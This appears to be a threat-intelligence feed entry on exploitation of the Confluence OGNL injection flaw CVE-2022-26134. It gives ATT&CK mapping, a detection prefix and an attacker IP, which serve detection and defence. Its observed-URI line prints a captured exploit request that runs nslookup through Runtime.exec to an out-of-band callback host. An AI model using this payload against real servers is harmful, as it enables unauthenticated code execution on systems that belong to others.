Confluence OGNL Expression Injection for 2022-08-26
Aug 26, 2022
WebExploit
Last Updated: 12:00 UTC
OGNL (Object-Graph Navigation Language) expression injection in Atlassian Confluence achieving unauthenticated RCE. The URL-encoded prefix %24%7B%40java.lang (${@java.lang) is the invariant for CVE-2022-26134 and related injection variants. Active exploitation includes OOB DNS callback canaries via interactsh.
CVE References
MITRE ATT&CK
Tactic: Initial Access (TA0001)
Technique: T1190 — Exploit Public-Facing Application
Observed URIs
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22nslookup%20cc4690pahc7v2qo000101atzezzjz83sy.oast.online%22%...
Attackers by Country
IP Address : ASN : City/Provider
- 185.156.74.58 : AS210848 telkom internet ltd : Russian Federation